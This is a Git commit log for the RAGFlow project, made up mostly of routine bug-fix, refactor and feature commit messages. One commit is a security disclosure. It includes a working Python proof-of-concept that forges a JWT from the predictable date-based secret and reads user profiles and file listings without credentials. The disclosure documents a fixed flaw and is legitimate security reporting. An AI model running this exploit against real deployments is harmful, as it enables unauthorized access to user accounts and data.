597 Commits

Author SHA1 Message Date
Yongteng Lei
d768130204
Fix: chunk number error after re-parsing (#8513)
### What problem does this PR solve?

Fix chunk number error after re-parsing. #8503.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-26 17:46:53 +08:00
Liu An
d11cfd4e45
Fix: Add input validation to chunk creation endpoint (#8516)
### What problem does this PR solve?

- Include optional `tag_feas` field if present in request
- Add input validation for `important_kwd` and `question_kwd` to ensure
they are lists
- #8462

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-26 17:46:00 +08:00
Yongteng Lei
0eb90e73a5
Feat: add MCP dashboard functionalities list_tools and test_tool (#8505)
### What problem does this PR solve?

Add MCP dashboard functionalities list_tools and test_tool.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-06-26 13:52:01 +08:00
Liu An
dac5bcdf17
Fix: Enforce default embedding model in create_dataset / update_dataset (#8486)
### What problem does this PR solve?

Previous:
- Defaulted to hardcoded model 'BAAI/bge-large-zh-v1.5@BAAI'
- Did not respect user-configured default embedding_model

Now:
- Correctly prioritizes user-configured default embedding_model

Other:
- Make embedding_model optional in CreateDatasetReq with proper None
handling
- Add default embedding model fallback in dataset update when empty
- Enhance validation utils to handle None values and string
normalization
- Update SDK default embedding model to None to match API changes
- Adjust related test cases to reflect new validation rules

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-25 16:41:32 +08:00
Yongteng Lei
af6850c8d8
Feat: add MCP dashboard operations (#8460)
### What problem does this PR solve?

Add MCP server dashboard operations.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-06-25 09:26:04 +08:00
Stephen Hu
382d2d0373
Refactor:Improve insert file logic (#8445)
### What problem does this PR solve?

before refactor
1. create file record
2. Add to blob

if have some execption at 2 the system db will have a file record but
not have related blob, which will introduce some bug.

after refactor
1. add to blob
2. create file record.

if 1 success but 2 failed just have a dirty blob in blob system, user
will not feel that



### Type of change


- [x] Refactoring
2025-06-24 13:17:22 +08:00
Song Fuchang
fd7ac17605
Feat: Scratch MCP tool calling support. (#8263)
### What problem does this PR solve?

This is a cherry-pick from #7781 as requested.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2025-06-23 17:45:35 +08:00
Yongteng Lei
936a91c5fe
Fix: code debug may corrupt by history answer (#8385)
### What problem does this PR solve?

Fix code debug may corrupt by history answer.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-20 14:23:02 +08:00
Liu An
9077ee8d15
Fix: desc parameter parsing (#8362)
### What problem does this PR solve?

- Correct boolean parsing for 'desc' parameter in document_app.py to
properly handle string values

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-19 14:22:56 +08:00
RyanFernandes23
c8b1790c92
Fix typo in dataset name length error message (#8351)
### What problem does this PR solve?

Fixes a minor grammar issue in a user-facing error message. The original
message said "large than" instead of the correct comparative form
"larger than". Just a quick fix I noticed while reading the code.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-19 09:54:30 +08:00
Yongteng Lei
1b022116d5
Feat: wrap search app (#8320)
### What problem does this PR solve?

Wrap search app

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-06-18 16:45:42 +08:00
Liu An
0a13d79b94
Refa: Implement centralized file name length limit using FILE_NAME_LEN_LIMIT constant (#8318)
### What problem does this PR solve?

- Replace hardcoded 255-byte file name length checks with
FILE_NAME_LEN_LIMIT constant
- Update error messages to show the actual limit value
- #8290

### Type of change

- [x] Refactoring

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2025-06-17 18:01:30 +08:00
Liu An
64e281b398
Fix: Add validation for empty filenames in document_app.py (#8321)
### What problem does this PR solve?

- Add validation for empty filenames in document_app.py and trim
whitespace

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-17 15:53:41 +08:00
Liu An
a3bebeb599
Fix: Enforce 255-byte filename limit (#8290)
### What problem does this PR solve?

- Add filename length validation (<=255 bytes) for document
upload/rename in both HTTP and SDK APIs
- Update error messages for consistency
- Fix comparison operator in SDK from '>=' to '>' for filename length
check

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-16 16:39:41 +08:00
Kevin Hu
f7074037ef
Feat: Let number of task ahead be visible. (#8259)
### What problem does this PR solve?


![image](https://github.com/user-attachments/assets/d4ef0526-343a-426f-a85a-b05eb8b559a1)

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-06-13 17:32:40 +08:00
Liu An
99725444f1
Fix: desc parameter parsing (#8229)
### What problem does this PR solve?

- Fix boolean parsing for 'desc' parameter in kb_app.py to properly
handle string values

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-12 19:17:47 +08:00
Liu An
7fbbc9650d
Fix: Move pagerank field from create to update dataset API (#8217)
### What problem does this PR solve?

- Remove pagerank from CreateDatasetReq and add to UpdateDatasetReq
- Add pagerank update logic in dataset update endpoint
- Update API documentation to reflect changes
- Modify related test cases and SDK references

#8208

This change makes pagerank a mutable property that can only be set after
dataset creation, and only when using elasticsearch as the doc engine.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-12 15:47:49 +08:00
Liu An
d0c5ff04a6
Fix: Add pagerank validation for non-elasticsearch doc engines (#8215)
### What problem does this PR solve?

Validate that pagerank updates are only allowed when using elasticsearch
as the document engine. Return an error if pagerank is set while using a
different doc engine, preventing potential inconsistencies in document
scoring.

#8208

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-12 15:47:22 +08:00
Liu An
cef587abc2
Fix: Add validation for dataset name in KB update API (#8194)
### What problem does this PR solve?

Validate dataset name in knowledge base update endpoint to ensure:
- Name is a non-empty string
- Name length doesn't exceed DATASET_NAME_LIMIT
- Whitespace is trimmed before processing

Prevents invalid dataset names from being saved and provides clear error
messages.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-12 11:37:25 +08:00
Liu An
60c1bf5a19
Fix: duplicate knowledgebase name validation logic (#8199)
### What problem does this PR solve?

Change the condition from checking for >1 to >=1 when validating
duplicate knowledgebase names to properly catch all duplicates. This
ensures no two knowledgebases can have the same name for a tenant.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-12 09:46:57 +08:00
Liu An
e87ad8126c
Fix: Improve dataset name validation in KB app (#8188)
### What problem does this PR solve?

- Trim whitespace before checking for empty dataset names
- Change length check from >= to > DATASET_NAME_LIMIT for consistency

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-11 16:14:29 +08:00
Stephen Hu
e6f68e1ccf
Fix: When List Kbs some times the total is wrong (#8151)
### What problem does this PR solve?
for kb.app list method when owner_ids the total calculate is wrong (now
will base on the paged result to calculate total)

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-10 11:34:30 +08:00
yurhett
9c6c6c51e0
Fix: use jwks_uri from OIDC metadata for JWKS client (#8136)
### What problem does this PR solve?
Issue: #8051

The current implementation assumes JWKS endpoints follow the standard
`/.well-known/jwks.json` convention. This breaks authentication for OIDC
providers that use non-standard JWKS paths, resulting in 404 errors
during token validation.

Root Cause Analysis
- The OpenID Connect specification doesn't mandate a fixed path for JWKS
endpoints
- Some identity providers (like certain Keycloak configurations) use
custom endpoints
- Our previous approach constructed JWKS URLs by convention rather than
discovery

### Solution Approach
Instead of constructing JWKS URLs by appending to the issuer URI, we
now:
1. Properly leverage the `jwks_uri` from the OIDC discovery metadata
2. Honor the identity provider's actual configured endpoint

```python
# Before (fragile approach)
jwks_url = f"{self.issuer}/.well-known/jwks.json"

# After (standards-compliant)
jwks_cli = jwt.PyJWKClient(self.jwks_uri)  # Use discovered endpoint
```

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-10 10:16:58 +08:00
Liu An
968ffc7ef3
Refa: dataset operations to simplify error handling (#8132)
### What problem does this PR solve?

- Consolidate database operations within single try-except blocks in the
methods

### Type of change

- [x] Refactoring
2025-06-09 13:29:56 +08:00
Liu An
8b7c424617
Fix: Document.update() now refreshes object data (#8068)
### What problem does this PR solve?

#8067 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 12:46:29 +08:00
Gecko Security
de89b84661
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998)
### Description

There's a critical authentication bypass vulnerability that allows
remote attackers to gain unauthorized access to user accounts without
any credentials. The vulnerability stems from two security flaws: (1)
the application uses a predictable `SECRET_KEY` that defaults to the
current date, and (2) the authentication mechanism fails to properly
validate empty access tokens left by logged-out users. When combined,
these flaws allow attackers to forge valid JWT tokens and authenticate
as any user who has previously logged out of the system.

The authentication flow relies on JWT tokens signed with a `SECRET_KEY`
that, in default configurations, is set to `str(date.today())` (e.g.,
"2025-05-30"). When users log out, their `access_token` field in the
database is set to an empty string but their account records remain
active. An attacker can exploit this by generating a JWT token that
represents an empty access_token using the predictable daily secret,
effectively bypassing all authentication controls.


### Source - Sink Analysis

**Source (User Input):** HTTP Authorization header containing
attacker-controlled JWT token

**Flow Path:**
1. **Entry Point:** `load_user()` function in `api/apps/__init__.py`
(Line 142)
2. **Token Processing:** JWT token extracted from Authorization header
3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from
`api/settings.py` (Line 123)
4. **Database Query:** `UserService.query()` called with decoded empty
access_token
5. **Sink:** Authentication succeeds, returning first user with empty
access_token

### Proof of Concept

```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys

def exploit_ragflow(target):
    # Generate token with predictable key
    daily_key = str(date.today())
    serializer = URLSafeTimedSerializer(secret_key=daily_key)
    malicious_token = serializer.dumps("")
    
    print(f"Target: {target}")
    print(f"Secret key: {daily_key}")
    print(f"Generated token: {malicious_token}\n")
    
    # Test endpoints
    endpoints = [
        ("/v1/user/info", "User profile"),
        ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
    ]
    
    auth_headers = {"Authorization": malicious_token}
    
    for path, description in endpoints:
        print(f"Testing {description}...")
        response = requests.get(f"{target}{path}", headers=auth_headers)
        
        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 0:
                print(f"SUCCESS {description} accessible")
                if "user" in path:
                    user_data = data.get("data", {})
                    print(f"  Email: {user_data.get('email')}")
                    print(f"  User ID: {user_data.get('id')}")
                elif "file" in path:
                    files = data.get("data", {}).get("files", [])
                    print(f"  Files found: {len(files)}")
            else:
                print(f"Access denied")
        else:
            print(f"HTTP {response.status_code}")
        print()

if __name__ == "__main__":
    target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    exploit_ragflow(target_url)
```

**Exploitation Steps:**
1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty
access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any
credentials


**Version:** 0.19.0
@KevinHuSh @asiroliu @cike8899

Co-authored-by: nkoorty <amalyshau2002@gmail.com>
2025-06-05 12:10:24 +08:00
Liu An
ab5e3ded68
Fix: DataSet.update() now refreshes object data (#8058)
### What problem does this PR solve?

#8057 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 09:26:19 +08:00
Stephen Hu
b832372c98
Fix: /v1/conversation/completion KeyError: 'conversation_id' (#8037)
### What problem does this PR solve?

Close #8033

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-04 10:18:14 +08:00
Kevin Hu
b6f1cd7809
Fix: no kb selected for an assistant. (#8021)
### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-03 17:42:16 +08:00
Liu An
e64da8b2aa
Fix: sdk can not update chat model (#8016)
### What problem does this PR solve?

#7791

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-03 15:22:26 +08:00
Jin Hai
31f4d44c73
Update upload filename length limit from 128 to 256, which is aligned with os (#7971)
### What problem does this PR solve?

Change filename length limit from 128 to 256

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2025-05-30 14:25:59 +08:00
Stephen Hu
62611809e0
Fix: Add user_id when create Conversation (#7960)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7940

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-30 13:11:41 +08:00
dong
62de535ac8
Fix Bug: When performing the dify_retrieval, the metadata of the document was empty. (#7968)
### What problem does this PR solve?
When performing the dify_retrieval, the metadata of the document was
empty.


### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
2025-05-30 12:58:05 +08:00
天海蒼灆
f584f5c3d0
agents openai API add new way to get session_id (#7937)
### What problem does this PR solve?

SpringAI can only add session_id in metadata。so add new way to get
session_id from "id" or "metadata.id"

![image](https://github.com/user-attachments/assets/0c698ebb-2228-46d8-94c5-2a291b6f70bf)

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-05-29 13:31:17 +08:00
Yongteng Lei
b95747be4c
Fix: early return when update doc in sdk (#7907)
### What problem does this PR solve?

Fix early return when update doc. #7886

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-28 19:20:27 +08:00
Qidi Cao
4d835b7303
fix: resolve “has no attribute 'max_length'” error in keyword_extraction (#7903)
### What problem does this PR solve?

**Issue Description:**

When using the `/api/retrieval` endpoint with a POST request and setting
the `keyword` parameter to `true`, the system invokes the
`model_instance` method from `TenantLLMService` to create a `chat_mdl`
instance. Subsequently, it calls the `keyword_extraction` method to
extract keywords.

However, within the `keyword_extraction` method, the `chat` function of
the LLM attempts to access the `chat_mdl.max_length` attribute to
validate input length. This results in the following error:

```
AttributeError: 'SILICONFLOWChat' object has no attribute 'max_length'
```

**Proposed Solution:**

Upon reviewing other parts of the codebase where `chat_mdl` instances
are created, it appears that utilizing `LLMBundle` for instantiation is
more appropriate. `LLMBundle` includes the `max_length` attribute, which
should resolve the encountered error.



### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
2025-05-28 10:58:06 +08:00
Kevin Hu
1f32e6e4f4
Fix: list out of boundary (#7843)
### What problem does this PR solve?

Close #7837
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-26 10:28:36 +08:00
Hao Zhang
2f4d803db1
Delete Corresponding Minio Bucket When Deleting a Knowledge Base (#7841)
### What problem does this PR solve?

Delete Corresponding Minio Bucket When Deleting a Knowledge Base
[issue #4113 ](https://github.com/infiniflow/ragflow/issues/4113)

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
2025-05-26 10:02:51 +08:00
liu an
e166f132b3 Feat: change default models (#7777)
### What problem does this PR solve?

change default models to buildin models
https://github.com/infiniflow/ragflow/issues/7774

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-05-23 18:21:25 +08:00
liu an
fed1221302
Refa: HTTP API list datasets / test cases / docs (#7720)
### What problem does this PR solve?

This PR introduces Pydantic-based validation for the list datasets HTTP
API, improving code clarity and robustness. Key changes include:

Pydantic Validation
Error Handling
Test Updates
Documentation Updates

### Type of change

- [x] Documentation Update
- [x] Refactoring
2025-05-20 09:58:26 +08:00
Chaoxi Weng
6ed81d6774
Feat: Add OAuth state parameter for CSRF protection (#7709)
### What problem does this PR solve?

Add OAuth `state` parameter for CSRF protection:
- Updated `get_authorization_url()` to accept an optional state
parameter
- Generated a unique state value during OAuth login and stored in
session
- Verified state parameter in callback to ensure request legitimacy

This PR follows OAuth 2.0 security best practices by ensuring that the
authorization request originates from the same user who initiated the
flow.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-05-20 09:40:31 +08:00
donblack01
115850945e
Fix:When you create a new API module named xxxa_api, the access route will become xxx instead of xxxa. For example, when I create a new API module named 'data_api', the access route will become 'dat' instead of 'data (#7325)
### What problem does this PR solve?

Fix:When you create a new API module named xxxa_api, the access route
will become xxx instead of xxxa. For example, when I create a new API
module named 'data_api', the access route will become 'dat' instead of
'data'
Fix:Fixed the issue where the new knowledge base would not be renamed
when there was a knowledge base with the same name

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: tangyu <1@1.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2025-05-20 09:39:26 +08:00
Yongteng Lei
0ebf05440e
Feat: repair corrupted PDF files on upload automatically (#7693)
### What problem does this PR solve?

Try the best to repair corrupted PDF files on upload automatically.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-05-19 14:54:06 +08:00
liwenju0
7df1bd4b4a
When creating an assistant, no dataset is specified, a different default system promt is used (#7690)
### What problem does this PR solve?

- Updated the dialog settings function to add a default prompt
configuration for no dataset.
- The prompt configuration will be determined based on the presence of
`kb_ids` in the request.


### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (Non-breaking change, adding functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):

---------

Co-authored-by: wenju.li <wenju.li@deepctr.cn>
2025-05-19 11:33:54 +08:00
Song Fuchang
b0275b8483
Fix: value too long error for chat name (#7697)
### What problem does this PR solve?

Hello, when I input a very long line in the chat input box, it will fail
with following error:

```
2025-05-17 16:11:26,004 ERROR    182558 value too long for type character varying(255)
Traceback (most recent call last):
  File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3291, in execute_sql
    cursor.execute(sql, params or ())
psycopg2.errors.StringDataRightTruncation: value too long for type character varying(255)


During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/var/home/sfc/Projects/ragflow/api/apps/conversation_app.py", line 68, in set_conversation
    ConversationService.save(**conv)
  File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3128, in inner
    return fn(*args, **kwargs)
  File "/var/home/sfc/Projects/ragflow/api/db/services/common_service.py", line 145, in save
    return cls.save_n(**kwargs)
  File "/var/home/sfc/Projects/ragflow/api/db/services/common_service.py", line 139, in save_n
    sample_obj = cls.model(**kwargs).save(force_insert=True)
  File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 6923, in save
    pk = self.insert(**field_dict).execute()
  File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2011, in inner
    return method(self, database, *args, **kwargs)
  File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2082, in execute
    return self._execute(database)
  File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2887, in _execute
    return super(Insert, self)._execute(database)
  File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2598, in _execute
    cursor = self.execute_returning(database)
  File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2605, in execute_returning
    cursor = database.execute(self)
  File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3299, in execute
    return self.execute_sql(sql, params)
  File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3289, in execute_sql
    with __exception_wrapper__:
  File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3059, in __exit__
    reraise(new_type, new_type(exc_value, *exc_args), traceback)
  File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 192, in reraise
    raise value.with_traceback(tb)
  File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3291, in execute_sql
    cursor.execute(sql, params or ())
peewee.DataError: value too long for type character varying(255)
```

This PR fix it by truncate the `name` field in the `set_conversation`
method in the `conversation_app.py`.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
2025-05-19 10:25:41 +08:00
Song Fuchang
a1f06a4fdc
Feat: Support tool calling in Generate component (#7572)
### What problem does this PR solve?

Hello, our use case requires LLM agent to invoke some tools, so I made a
simple implementation here.

This PR does two things:

1. A simple plugin mechanism based on `pluginlib`:

This mechanism lives in the `plugin` directory. It will only load
plugins from `plugin/embedded_plugins` for now.

A sample plugin `bad_calculator.py` is placed in
`plugin/embedded_plugins/llm_tools`, it accepts two numbers `a` and `b`,
then give a wrong result `a + b + 100`.

In the future, it can load plugins from external location with little
code change.

Plugins are divided into different types. The only plugin type supported
in this PR is `llm_tools`, which must implement the `LLMToolPlugin`
class in the `plugin/llm_tool_plugin.py`.
More plugin types can be added in the future.

2. A tool selector in the `Generate` component:

Added a tool selector to select one or more tools for LLM:


![image](https://github.com/user-attachments/assets/74a21fdf-9333-4175-991b-43df6524c5dc)

And with the `bad_calculator` tool, it results this with the `qwen-max`
model:


![image](https://github.com/user-attachments/assets/93aff9c4-8550-414a-90a2-1a15a5249d94)


### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):

Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
2025-05-16 16:32:19 +08:00
Chaoxi Weng
205974c359
Docs: Improve oauth configuration documentation and examples (#7675)
### What problem does this PR solve?

Improve oauth configuration documentation and examples.

- Related pull requests: 
  - #7379
  - #7553
  - #7587
- Related issues:
  -  #3495
### Type of change

- [x] Documentation Update
2025-05-16 14:17:39 +08:00
Stephen Hu
deb2faf7aa
Fix:Fail to get list_sessions (#7678)
### What problem does this PR solve?

Close #7655

Based on the codes atthe api_app, I think the reference is one-to-one
with the message
`
    def fillin_conv(ans):
        nonlocal conv, message_id
        if not conv.reference:
            conv.reference.append(ans["reference"])
        else:
            conv.reference[-1] = ans["reference"]
conv.message[-1] = {"role": "assistant", "content": ans["answer"], "id":
message_id}
        ans["id"] = message_id
`



### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-16 10:58:28 +08:00
liu an
ae8b628f0a
Refa: HTTP API delete dataset / test cases / docs (#7657)
### What problem does this PR solve?

This PR introduces Pydantic-based validation for the delete dataset HTTP
API, improving code clarity and robustness. Key changes include:

1. Pydantic Validation
2. Error Handling
3. Test Updates
4. Documentation Updates

### Type of change

- [x] Documentation Update
- [x] Refactoring
2025-05-16 10:16:43 +08:00
Chaoxi Weng
a8542508b7
Refa: Deprecate /github_callback in favor of /oauth/callback/<channel> for GitHub OAuth integration (#7587)
### What problem does this PR solve?

Deprecate `/github_callback` route in favor of
`/oauth/callback/<channel>` for GitHub OAuth integration:

- Added GitHub OAuth support in the authentication module
- Introduced `GithubOAuthClient` with methods to fetch and normalize
user info
  - Updated `CLIENT_TYPES` to include GitHub OAuth client
- Deprecated `/github_callback` route and suggested using the generic
`/oauth/callback/<channel>` route

---
- Related pull requests: 
  - #7379
  - #7553 

### Usage

- [Create a GitHub OAuth
App](https://github.com/settings/applications/new) to obtain the
`client_id` and `client_secret`, configure the authorization callback
url: `https://your-app.com/v1/user/oauth/callback/github`
- Edit `service_conf.yaml.template`:
  ```yaml
  # ...
  oauth:
    github:
      type: "github"
      icon: "github"
      display_name: "Github"
      client_id: "your_client_id"
      client_secret: "your_client_secret"
      redirect_uri: "https://your-app.com/v1/user/oauth/callback/github"
  # ...
  ```

### Type of change

- [x] Documentation Update
- [x] Refactoring (non-breaking change)
2025-05-15 14:39:37 +08:00